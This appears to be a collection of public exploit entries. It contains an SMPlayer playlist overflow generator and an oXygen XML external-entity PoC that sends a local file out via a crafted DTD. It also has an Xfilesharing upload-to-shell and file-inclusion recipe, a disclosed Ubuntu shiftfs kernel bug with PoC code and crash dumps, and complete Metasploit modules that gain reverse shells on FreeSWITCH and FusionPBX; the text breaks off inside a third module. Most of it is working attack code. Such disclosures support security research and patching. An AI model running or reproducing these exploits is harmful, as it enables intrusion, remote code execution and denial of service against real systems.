#!/usr/bin/python

# Title : SMPlayer Denial Of Service Buffer Overflow 19.5.0 32 bit
# Tested on : Windows 7 (64 bit)
# Vulnerable Software: SMPlayer v 19.5.0
# Exploit Author: Malav Vyas
# Twitter : @malav_vyas1
# Vendor Homepage: https://smplayer.info
# Version : 19.5.0
# Software Link : https://smplayer.info/en/downloads

# POC
# run this python file, which will generate attack.m3u file
# .m3u file is used as a playlist
# this python file will generate a .m3u file with 25000 "A" characters.
# Open this file in SMPlayer two times.
# second time, buffer would be successfully overflowed and it would result in a Denial Of Service attack.
# For more details, please refer to video

f="attack.m3u"

bof = "A"*25000

writeFile = open(f, "w")
writeFile.write(bof)
writeFile.close()

# Exploit Title: oXygen XML Editor 21.1.1 - XML External Entity Injection
# Author: Pablo Santiago
# Date: 2019-11-13
# Vendor Homepage: https://www.oxygenxml.com/
# Source:https://www.oxygenxml.com/xml_editor/download_oxygenxml_editor.html
# Version: 21.1.1
# CVE : N/A
# Tested on: Windows 7

#PoC

1- python -m SimpleHTTPServer 8000
1.1- Poc.xml :
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

1.2.- payload.dtd
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">
%all;
2- File -> Open -> *.xml

#PoC Visual
https://imgur.com/2H8DhL9

# Exploit Title: Xfilesharing 2.5.1 - Arbitrary File Upload
# Google Dork: inurl:/?op=registration
# Date: 2019-11-4
# Exploit Author: Noman Riffat
# Vendor Homepage: https://sibsoft.net/xfilesharing.html
# Version: <=2.5.1
# CVE : CVE-2019-18951, CVE-2019-18952

#####################
Arbitrary File Upload
#####################

<form action="http://xyz.com/cgi-bin/up.cgi" method="post" enctype="multipart/form-data">
<input type="text" name="sid" value="joe">
<input type="file" name="file">
<input type="submit" value="Upload" name="submit">
</form>

Shell : http://xyz.com/cgi-bin/temp/joe/shell.php

####################
Local File Inclusion
####################

http://xyz.com/?op=page&tmpl=../../admin_settings

This URL will fetch "admin_settings.html" template without any authentication. The ".html" extension is hard coded on the server so the included file must be with html extension anywhere on the server. You can even merge LFI with Arbitrary File Upload vulnerability by uploading an html file i.e. "upload.html" and changing the "sid" to "../../../../../../tmp" and so the file gets uploaded in tmp directory of the server. Now you can include the file like following.

http://xyz.com/?op=page&tmpl=../../../../../../../tmp/upload

The Xfilesharing script has builtin shortcodes as well so you can achieve RCE by including them in that "upload.html" file.

Noman Riffat, National Security Services Group Oman
@nomanriffat, @nssgoman

Ubuntu: refcount underflow and type confusion in shiftfs

Tested on Ubuntu 19.10, kernel \"5.3.0-19-generic #20-Ubuntu\".

Ubuntu ships a filesystem \"shiftfs\" in fs/shiftfs.c in the kernel tree that
doesn't exist upstream. This filesystem can be mounted from user namespaces,
meaning that this is attack surface from unprivileged userspace in the default
installation.

There are two memory safety bugs around shiftfs_btrfs_ioctl_fd_replace().

#################### Bug 1: Flawed reference counting ####################

In shiftfs_btrfs_ioctl_fd_replace() (\"//\" comments added by me):


\tsrc = fdget(oldfd);
\tif (!src.file)
\t\treturn -EINVAL;
\t// src holds one reference (assuming multithreaded execution)

\tret = shiftfs_real_fdget(src.file, lfd);
\t// lfd->file is a file* now, but shiftfs_real_fdget didn't take any
\t// extra references
\tfdput(src);
\t// this drops the only reference we were holding on src, and src was
\t// the only thing holding a reference to lfd->file. lfd->file may be
\t// dangling at this point.
\tif (ret)
\t\treturn ret;

\t*newfd = get_unused_fd_flags(lfd->file->f_flags);
\tif (*newfd < 0) {
\t\t// always a no-op
\t\tfdput(*lfd);
\t\treturn *newfd;
\t}

\tfd_install(*newfd, lfd->file);
\t// fd_install() consumes a counted reference, but we don't hold any
\t// counted references. so at this point, if lfd->file hasn't been freed
\t// yet, its refcount is one lower than it ought to be.

\t[...]

\t// the following code is refcount-neutral, so the refcount stays one too
\t// low.
\tif (ret)
\t\tshiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);


shiftfs_real_fdget() is implemented as follows:

static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
{
\tstruct shiftfs_file_info *file_info = file->private_data;
\tstruct file *realfile = file_info->realfile;

\tlowerfd->flags = 0;
\tlowerfd->file = realfile;

\t/* Did the flags change since open? */
\tif (unlikely(file->f_flags & ~lowerfd->file->f_flags))
\t\treturn shiftfs_change_flags(lowerfd->file, file->f_flags);

\treturn 0;
}

Therefore, the following PoC will cause reference count overdecrements; I ran it
with SLUB debugging enabled and got the following splat:

=======================================
user@ubuntu1910vm:~/shiftfs$ cat run.sh
#!/bin/sh
sync
unshare -mUr ./run2.sh
t run2user@ubuntu1910vm:~/shiftfs$ cat run2.sh
#!/bin/sh
set -e

mkdir -p mnt/tmpfs
mkdir -p mnt/shiftfs
mount -t tmpfs none mnt/tmpfs
mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
mount|grep shift
touch mnt/tmpfs/foo
gcc -o ioctl ioctl.c -Wall
./ioctl
user@ubuntu1910vm:~/shiftfs$ cat ioctl.c
#include <sys/ioctl.h>
#include <fcntl.h>
#include <err.h>
#include <unistd.h>
#include <linux/btrfs.h>
#include <sys/mman.h>

int main(void) {
  int root = open(\"mnt/shiftfs\", O_RDONLY);
  if (root == -1) err(1, \"open shiftfs root\");
  int foofd = openat(root, \"foo\", O_RDONLY);
  if (foofd == -1) err(1, \"open foofd\");
  struct btrfs_ioctl_vol_args iocarg = {
    .fd = foofd
  };
  ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
  sleep(1);
  void *map = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
  if (map != MAP_FAILED) munmap(map, 0x1000);
}
user@ubuntu1910vm:~/shiftfs$ ./run.sh
none on /home/user/shiftfs/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
/home/user/shiftfs/mnt/tmpfs on /home/user/shiftfs/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
[  183.463452] general protection fault: 0000 [#1] SMP PTI
[  183.467068] CPU: 1 PID: 2473 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
[  183.472170] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
[  183.476830] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[  183.478524] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[  183.484585] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
[  183.486290] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
[  183.489617] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
[  183.491975] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
[  183.494311] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
[  183.496675] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
[  183.499011] FS:  00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
[  183.501679] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  183.503568] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
[  183.505901] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[  183.508229] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[  183.510580] Call Trace:
[  183.511396]  mmap_region+0x417/0x670
[  183.512592]  do_mmap+0x3a8/0x580
[  183.513655]  vm_mmap_pgoff+0xcb/0x120
[  183.514863]  ksys_mmap_pgoff+0x1ca/0x2a0
[  183.516155]  __x64_sys_mmap+0x33/0x40
[  183.517352]  do_syscall_64+0x5a/0x130
[  183.518548]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  183.520196] RIP: 0033:0x7f1d01bfaaf6
[  183.521372] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48 89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61
[  183.527210] RSP: 002b:00007ffdf50bae98 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[  183.529582] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007f1d01bfaaf6
[  183.531811] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[  183.533999] RBP: 0000000000000000 R08: 0000000000000004 R09: 0000000000000000
[  183.536199] R10: 0000000000000001 R11: 0000000000000246 R12: 00005616cf6f5140
[  183.538448] R13: 00007ffdf50bbfb0 R14: 0000000000000000 R15: 0000000000000000
[  183.540714] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm irqbypass snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core crct10dif_pclmul snd_hwdep crc32_pclmul ghash_clmulni_intel snd_pcm aesni_intel snd_seq_midi snd_seq_midi_event aes_x86_64 crypto_simd snd_rawmidi cryptd joydev input_leds snd_seq glue_helper qxl snd_seq_device snd_timer ttm drm_kms_helper drm snd fb_sys_fops syscopyarea sysfillrect sysimgblt serio_raw qemu_fw_cfg soundcore mac_hid sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid virtio_net net_failover psmouse ahci i2c_i801 libahci lpc_ich virtio_blk failover
[  183.560350] ---[ end trace 4a860910803657c2 ]---
[  183.561832] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[  183.563496] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[  183.569438] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
[  183.571102] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
[  183.573362] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
[  183.575655] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
[  183.577893] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
[  183.580166] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
[  183.582411] FS:  00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
[  183.584960] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  183.586796] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
[  183.589035] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[  183.591279] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
=======================================

Disassembly of surrounding code:

55                push rbp
4889E5            mov rbp,rsp
4157              push r15
4156              push r14
4155              push r13
4154              push r12
488B87C8000000    mov rax,[rdi+0xc8]
4C8B6810          mov r13,[rax+0x10]
498B4528          mov rax,[r13+0x28]
4883786000        cmp qword [rax+0x60],byte +0x0 <-- GPF HERE
0F8497000000      jz near 0xcc
4989FC            mov r12,rdi
4989F6            mov r14,rsi

This is an attempted dereference of 0x6b6b6b6b6b6b6b6b, which is POISON_FREE; I
think this corresponds to the load of \"realfile->f_op->mmap\" in the source code.



#################### Bug 2: Type confusion ####################

shiftfs_btrfs_ioctl_fd_replace() calls fdget(oldfd), then without further checks
passes the resulting file* into shiftfs_real_fdget(), which does this:

static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
{
\tstruct shiftfs_file_info *file_info = file->private_data;
\tstruct file *realfile = file_info->realfile;

\tlowerfd->flags = 0;
\tlowerfd->file = realfile;

\t/* Did the flags change since open? */
\tif (unlikely(file->f_flags & ~lowerfd->file->f_flags))
\t\treturn shiftfs_change_flags(lowerfd->file, file->f_flags);

\treturn 0;
}

file->private_data is a void* that points to a filesystem-dependent type; and
some filesystems even use it to store a type-cast number instead of a pointer.
The implicit cast to a \"struct shiftfs_file_info *\" can therefore be a bad cast.

As a PoC, here I'm causing a type confusion between struct shiftfs_file_info
(with ->realfile at offset 0x10) and struct mm_struct (with vmacache_seqnum at
offset 0x10), and I use that to cause a memory dereference somewhere around
0x4242:


=======================================
user@ubuntu1910vm:~/shiftfs_confuse$ cat run.sh
#!/bin/sh
sync
unshare -mUr ./run2.sh
user@ubuntu1910vm:~/shiftfs_confuse$ cat run2.sh
#!/bin/sh
set -e

mkdir -p mnt/tmpfs
mkdir -p mnt/shiftfs
mount -t tmpfs none mnt/tmpfs
mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
mount|grep shift
gcc -o ioctl ioctl.c -Wall
./ioctl
user@ubuntu1910vm:~/shiftfs_confuse$ cat ioctl.c
#include <sys/ioctl.h>
#include <fcntl.h>
#include <err.h>
#include <unistd.h>
#include <linux/btrfs.h>
#include <sys/mman.h>

int main(void) {
  // make our vmacache sequence number something like 0x4242
  for (int i=0; i<0x4242; i++) {
    void *x = mmap((void*)0x100000000UL, 0x1000, PROT_READ,
        MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
    if (x == MAP_FAILED) err(1, \"mmap vmacache seqnum\");
    munmap(x, 0x1000);
  }

  int root = open(\"mnt/shiftfs\", O_RDONLY);
  if (root == -1) err(1, \"open shiftfs root\");
  int foofd = open(\"/proc/self/environ\", O_RDONLY);
  if (foofd == -1) err(1, \"open foofd\");
  // trigger the confusion
  struct btrfs_ioctl_vol_args iocarg = {
    .fd = foofd
  };
  ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
}
user@ubuntu1910vm:~/shiftfs_confuse$ ./run.sh
none on /home/user/shiftfs_confuse/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
/home/user/shiftfs_confuse/mnt/tmpfs on /home/user/shiftfs_confuse/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
[  348.103005] BUG: unable to handle page fault for address: 0000000000004289
[  348.105060] #PF: supervisor read access in kernel mode
[  348.106573] #PF: error_code(0x0000) - not-present page
[  348.108102] PGD 0 P4D 0 
[  348.108871] Oops: 0000 [#1] SMP PTI
[  348.109912] CPU: 6 PID: 2192 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
[  348.112109] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
[  348.114460] RIP: 0010:shiftfs_real_ioctl+0x22e/0x410 [shiftfs]
[  348.116166] Code: 38 44 89 ff e8 43 91 01 d3 49 89 c0 49 83 e0 fc 0f 84 ce 01 00 00 49 8b 90 c8 00 00 00 41 8b 70 40 48 8b 4a 10 89 c2 83 e2 01 <8b> 79 40 48 89 4d b8 89 f8 f7 d0 85 f0 0f 85 e8 00 00 00 85 d2 75
[  348.121578] RSP: 0018:ffffb1e7806ebdc8 EFLAGS: 00010246
[  348.123097] RAX: ffff9ce6302ebcc0 RBX: ffff9ce6302e90c0 RCX: 0000000000004249
[  348.125174] RDX: 0000000000000000 RSI: 0000000000008000 RDI: 0000000000000004
[  348.127222] RBP: ffffb1e7806ebe30 R08: ffff9ce6302ebcc0 R09: 0000000000001150
[  348.129288] R10: ffff9ce63680e840 R11: 0000000080010d00 R12: 0000000050009401
[  348.131358] R13: 00007ffd87558310 R14: ffff9ce60cffca88 R15: 0000000000000004
[  348.133421] FS:  00007f77fa842540(0000) GS:ffff9ce637b80000(0000) knlGS:0000000000000000
[  348.135753] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  348.137413] CR2: 0000000000004289 CR3: 000000026ff94001 CR4: 0000000000360ee0
[  348.139451] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[  348.141516] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[  348.143545] Call Trace:
[  348.144272]  shiftfs_ioctl+0x65/0x76 [shiftfs]
[  348.145562]  do_vfs_ioctl+0x407/0x670
[  348.146620]  ? putname+0x4a/0x50
[  348.147556]  ksys_ioctl+0x67/0x90
[  348.148514]  __x64_sys_ioctl+0x1a/0x20
[  348.149593]  do_syscall_64+0x5a/0x130
[  348.150658]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  348.152108] RIP: 0033:0x7f77fa76767b
[  348.153140] Code: 0f 1e fa 48 8b 05 15 28 0d 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d e5 27 0d 00 f7 d8 64 89 01 48
[  348.158466] RSP: 002b:00007ffd875582e8 EFLAGS: 00000217 ORIG_RAX: 0000000000000010
[  348.160610] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f77fa76767b
[  348.162644] RDX: 00007ffd87558310 RSI: 0000000050009401 RDI: 0000000000000003
[  348.164680] RBP: 00007ffd87559320 R08: 00000000ffffffff R09: 0000000000000000
[  348.167456] R10: 0000000000000000 R11: 0000000000000217 R12: 0000561c135ee100
[  348.169530] R13: 00007ffd87559400 R14: 0000000000000000 R15: 0000000000000000
[  348.171573] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm snd_hda_codec_generic irqbypass ledtrig_audio crct10dif_pclmul crc32_pclmul snd_hda_intel snd_hda_codec ghash_clmulni_intel snd_hda_core snd_hwdep aesni_intel aes_x86_64 snd_pcm crypto_simd cryptd glue_helper snd_seq_midi joydev snd_seq_midi_event snd_rawmidi snd_seq input_leds snd_seq_device snd_timer serio_raw qxl snd ttm drm_kms_helper mac_hid soundcore drm fb_sys_fops syscopyarea sysfillrect qemu_fw_cfg sysimgblt sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid psmouse i2c_i801 ahci virtio_net lpc_ich libahci net_failover failover virtio_blk
[  348.188617] CR2: 0000000000004289
[  348.189586] ---[ end trace dad859a1db86d660 ]---
[  348.190916] RIP: 0010:shiftfs_real_ioctl+0x22e/0x410 [shiftfs]
[  348.193401] Code: 38 44 89 ff e8 43 91 01 d3 49 89 c0 49 83 e0 fc 0f 84 ce 01 00 00 49 8b 90 c8 00 00 00 41 8b 70 40 48 8b 4a 10 89 c2 83 e2 01 <8b> 79 40 48 89 4d b8 89 f8 f7 d0 85 f0 0f 85 e8 00 00 00 85 d2 75
[  348.198713] RSP: 0018:ffffb1e7806ebdc8 EFLAGS: 00010246
[  348.200226] RAX: ffff9ce6302ebcc0 RBX: ffff9ce6302e90c0 RCX: 0000000000004249
[  348.202257] RDX: 0000000000000000 RSI: 0000000000008000 RDI: 0000000000000004
[  348.204294] RBP: ffffb1e7806ebe30 R08: ffff9ce6302ebcc0 R09: 0000000000001150
[  348.206324] R10: ffff9ce63680e840 R11: 0000000080010d00 R12: 0000000050009401
[  348.208362] R13: 00007ffd87558310 R14: ffff9ce60cffca88 R15: 0000000000000004
[  348.210395] FS:  00007f77fa842540(0000) GS:ffff9ce637b80000(0000) knlGS:0000000000000000
[  348.212710] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  348.214365] CR2: 0000000000004289 CR3: 000000026ff94001 CR4: 0000000000360ee0
[  348.216409] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[  348.218349] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Killed
user@ubuntu1910vm:~/shiftfs_confuse$ 
=======================================


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.

Related CVE Numbers: CVE-2019-15793.



Found by: jannh@google.com

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Powershell
  include Msf::Exploit::CmdStager
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
'Name'            => 'FreeSWITCH Event Socket Command Execution',
'Description'     => %q{
        This module uses the FreeSWITCH event socket interface
        to execute system commands using the `system` API command.

        The event socket service is enabled by default and listens
        on TCP port 8021 on the local network interface.

        This module has been tested successfully on FreeSWITCH versions:

        1.6.10-17-726448d~44bit on FreeSWITCH-Deb8-TechPreview virtual machine;
        1.8.4~64bit on Ubuntu 19.04 (x64); and
        1.10.1~64bit on Windows 7 SP1 (EN) (x64).
      },
'License'         => MSF_LICENSE,
'Author'          => ['bcoles'],
'References'      =>
        [
          ['CWE', '260'], # default password, configurable in event_socket.conf.xml
          ['URL', 'https://freeswitch.org/confluence/display/FREESWITCH/mod_event_socket']
        ],
'Platform'        => %w[win linux unix bsd],
'Arch'            => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Payload'         => {'BadChars' => "\x00\x0a\x0d\x27\x5c"},
'CmdStagerFlavor' => %w[curl wget certutil vbs],
'Targets'         =>
        [
          ['Unix (In-Memory)',
'Platform'       => 'unix',
'Arch'           => ARCH_CMD,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'},
'Type'           => :unix_memory
          ],
          ['Linux (Dropper)',
'Platform'       => 'linux',
'Arch'           => [ARCH_X86, ARCH_X64],
'DefaultOptions' => {'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'},
'Type'           => :linux_dropper
          ],
          ['PowerShell (In-Memory)',
'Platform'       => 'win',
'Arch'           => [ARCH_X86, ARCH_X64],
'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'},
'Type'           => :psh_memory
          ],
          ['Windows (In-Memory)',
'Platform'       => 'win',
'Arch'           => ARCH_CMD,
'DefaultOptions' => {'PAYLOAD' => 'cmd/windows/reverse_powershell'},
'Type'           => :win_memory
          ],
          ['Windows (Dropper)',
'Platform'       => 'win',
'Arch'           => [ARCH_X86, ARCH_X64],
'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'},
'Type'           => :win_dropper
          ]
        ],
'Privileged'      => false,
'DefaultOptions'  => { 'RPORT' => 8021 },
'DisclosureDate'  => '2019-11-03',
'DefaultTarget'   => 0))
    register_options [
      OptString.new('PASSWORD', [true, 'FreeSWITCH event socket password', 'ClueCon'])
    ]
  end

  def check
    connect
    banner = sock.get_once.to_s
    disconnect

    if banner.include?('Access Denied, go away.') || banner.include?('text/rude-rejection')
      vprint_error 'Access denied by network ACL'
      return CheckCode::Safe
    end

    unless banner.include?('Content-Type: auth/request')
      return CheckCode::Safe
    end

    CheckCode::Appears
  end

  def auth(password)
    sock.put "auth #{password}\n\n"
    res = sock.get_once.to_s

    unless res.include? 'Content-Type: command/reply'
      fail_with Failure::UnexpectedReply, 'Unexpected reply'
    end

    unless res.include?('Reply-Text: +OK accepted')
      fail_with Failure::NoAccess, 'Login failed'
    end

    print_status 'Login success'
  end

  def execute_command(cmd, opts = {})
    api_function = opts[:foreground] ? 'system' : 'bg_system'

    sock.put "api #{api_function} #{cmd}\n\n"
    res = sock.get_once.to_s

    unless res.include? 'Content-Type: api/response'
      fail_with Failure::UnexpectedReply, 'Unexpected reply'
    end

    vprint_status "Response: #{res}"
  end

  def exploit
    unless check == CheckCode::Appears
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    connect
    banner = sock.get_once.to_s

    auth(datastore['PASSWORD'])

    print_status "Sending payload (#{payload.encoded.length} bytes) ..."

    case target['Type']
    when :unix_memory
      if datastore['PAYLOAD'] == 'cmd/unix/generic'
        execute_command(payload.encoded, foreground: true)
      else
        execute_command(payload.encoded)
      end
    when :win_memory
      if datastore['PAYLOAD'] == 'cmd/windows/generic'
        execute_command(payload.encoded, foreground: true)
      else
        execute_command(payload.encoded)
      end
    when :psh_memory
      execute_command(
        cmd_psh_payload(
          payload.encoded,
          payload_instance.arch.first,
          { :remove_comspec => true, :encode_final_payload => true }
        )
      )
    when :linux_dropper
      execute_cmdstager(:linemax => 1_500)
    when :win_dropper
      execute_cmdstager(:linemax => 1_500)
    end
  ensure
    disconnect unless sock.nil?
  end
end

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
'Name'            => 'FusionPBX Command exec.php Command Execution',
'Description'     => %q{
        This module uses administrative functionality available in FusionPBX
        to gain a shell.

        The Command section of the application permits users with `exec_view`
        permissions, or superadmin permissions, to execute arbitrary system
        commands, or arbitrary PHP code, as the web server user.

        This module has been tested successfully on FusionPBX version
        4.4.1 on Ubuntu 19.04 (x64).
      },
'License'         => MSF_LICENSE,
'Author'          => ['bcoles'],
'References'      =>
        [
          ['URL', 'https://docs.fusionpbx.com/en/latest/advanced/command.html']
        ],
'Platform'        => %w[php linux unix],
'Arch'            => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],
'Targets'         =>
        [
          ['Automatic (PHP In-Memory)',
'Platform'       => 'php',
'Arch'           => ARCH_PHP,
'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/reverse_tcp'},
'Type'           => :php_memory
          ],
          ['Automatic (Unix In-Memory)',
'Platform'       => 'unix',
'Arch'           => ARCH_CMD,
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'},
'Type'           => :unix_memory
          ],
          ['Automatic (Linux Dropper)',
'Platform'       => 'linux',
'Arch'           => [ARCH_X86, ARCH_X64],
'DefaultOptions' => {'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'},
'Type'           => :linux_dropper
          ]
        ],
'Privileged'      => false,
'DefaultOptions'  => { 'SSL' => true, 'RPORT' => 443 },
'DisclosureDate'  => '2019-11-02',
'DefaultTarget'   => 0))
    register_options [
      OptString.new('TARGETURI', [true, 'The base path to FusionPBX', '/']),
      OptString.new('USERNAME', [true, 'The username for FusionPBX', 'admin']),
      OptString.new('PASSWORD', [true, 'The password for FusionPBX'])
    ]
  end

  def login(user, pass)
    vprint_status "Authenticating as user '#{user}'"

    vars_post = {
      username: user,
      password: pass,
      path: ''
    }

    res = send_request_cgi({
'method'    => 'POST',
'uri'       => normalize_uri(target_uri.path, 'core/user_settings/user_dashboard.php'),
'vars_post' => vars_post
    })

    unless res
      fail_with Failure::Unreachable, 'Connection failed'
    end

    if res.code == 302 && res.headers['location'].include?('login.php')
      fail_with Failure::NoAccess, "Login failed for user '#{user}'"
    end

    unless res.code == 200
      fail_with Failure::UnexpectedReply, "Unexpected HTTP response status code #{res.code}"
    end

    cookie = res.get_cookies.to_s.scan(/PHPSESSID=(.+?);/).flatten.first

    unless cookie
      fail_with Failure::UnexpectedReply, 'Failed to retrieve PHPSESSID cookie'
    end

    print_good "Authenticated as user '#{user}'"

    cookie
  end

  def check
    res = send_request_cgi({
'uri' => normalize_uri(target_uri.path)
    })

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    if res.body.include?('FusionPBX')
      return CheckCode::Detected
    end

    CheckCode::Safe
  end

  def execute_command(cmd, opts = {})
    vars_post = {
      handler: 'php',
      table_name: '',
      sql_type: '',
      id: '',
      cmd: cmd
    }

    case opts[:handler]
    when 'php'
      vars_post[:handler] = 'php'
    when 'shell'
      vars_post[:handler] = 'shell'
    when 'switch'
      vars_post[:handler] = 'switch'
      vars_post[:cmd] = "bg_system #{cmd}"
    else
      vars_post[:handler] = 'shell'
    end

    res = send_request_cgi({
'method'    => 'POST',
'uri'       => normalize_uri(target_uri.path, 'app/exec/exec.php'),
'cookie'    => "PHPSESSID=#{@cookie}",
'vars_post' => vars_post
    }, 5)

    unless res
      return if session_created?
      fail_with Failure::Unreachable, 'Connection failed'
    end

    unless res.code == 200
      fail_with Failure::UnexpectedReply, "Unexpected HTTP response status code #{res.code}"
    end

    if res.body.include? 'access denied'
      fail_with Failure::NoAccess, "User #{datastore['USERNAME']} does not have permission to execute #{vars_post[:handler]} #{vars_post[:handler].eql?('php') ? 'code' : 'commands'}"
    end

    res
  end

  def exploit
    unless check == CheckCode::Detected
      fail_with Failure::NotVulnerable, "#{peer} - Target is not vulnerable"
    end

    @cookie = login(datastore['USERNAME'], datastore['PASSWORD'])

    print_status "Sending payload (#{payload.encoded.length} bytes) ..."

    case target['Type']
    when :php_memory
      execute_command(payload.encoded, handler: 'php')
    when :unix_memory
      execute_command(payload.encoded, handler: 'shell')
    when :linux_dropper
      execute_cmdstager(:linemax => 1_500, handler: 'shell')
    end
  end
end

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
'Name'            => 'FusionPBX Operator Panel exec.php Command Execution',
'Description'     => %q{
        This module exploits an authenticated command injection vulnerability
